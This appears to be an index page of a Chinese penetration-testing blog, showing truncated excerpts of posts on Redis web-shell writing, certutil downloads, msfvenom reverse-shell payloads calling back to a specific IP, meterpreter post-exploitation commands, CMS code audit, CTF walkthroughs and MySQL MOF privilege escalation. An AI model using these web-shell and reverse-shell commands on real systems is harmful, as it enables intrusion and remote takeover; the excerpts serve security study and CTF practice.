通过备份文件写shell1234567CONFIG SET dir /var/www/html CONGIG SET dbfilename shell.php SET shell "<?php system($_GET['cmd']);?>" ...

certutilCertutil.exe是一个命令行程序，作为证书服务的一部分安装。您可以使用Certutil.exe转储 和显示证书颁发机构（CA）配置信息，配置证书服务，备份和还原CA组件以及验证证书， 密钥对和证书链 下载默认下载后为bin文件,但不影响执行certutil.exe -urlc ...

有效命令msfvenom -p windows/x64/meterpreter/reverse_http lhost=114.116.33.191 lport=8888 -f exe>test_3.exemsfvenom -p windows/meterpreter/reverse_http ...

基于UDP简介UDP（User Datagram Protocol）是一种无连接的协议，在第四层-传输层，处于IP协议的 上一层。UDP有不提供数据包分组、组装和不能对数据包进行排序的缺点，也就是说，当报 文发送之后，是无法得知其是否安全完整到达的。 UDP特性：1.UDP 缺乏可靠性。UDP 本身 ...

运行自动化脚本 msfconsole -r auto.rc 检测是否为虚拟机 post/windows/gather/checkvm 获取磁盘信息 windows/gather/forensics/enum_drives 补丁信息 run post/windows/gather/ ...

基本命令background将meterpreter终端隐藏在后台,msf可执行其它任务. sessions查看已获取的会话,sessions -i 与某对话交互 quit关闭当前会话,返回msf终端 shell获取系统的控制台shell reboot重新启动受害人的计算机 irb与ruby终端交互 ...

在plus/search.php中:123456789101112131415161718192021222324252627282930313233if(empty($typeid)){ $typenameCacheFile = DEDEDATA.'/cache/type ...

目标Escalate the privileges to root and capture the flag. Once anyone able to beat the machine then please let me know. 信息收集端口扫描 nmap -p 1-65535 -T4 -A ...

目标The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. If you can find the secret, send ...

mof提权原理在windows平台下，c:/windows/system32/wbem/mof/nullevt.mof这个文件会每间隔一段时间（很短暂）就会以system权限执行一次，所以，只要我们将我们先要做的事通过代码存储到这个mof文件中，就可以实现权限提升。 利用条件1.mysql用户具 ...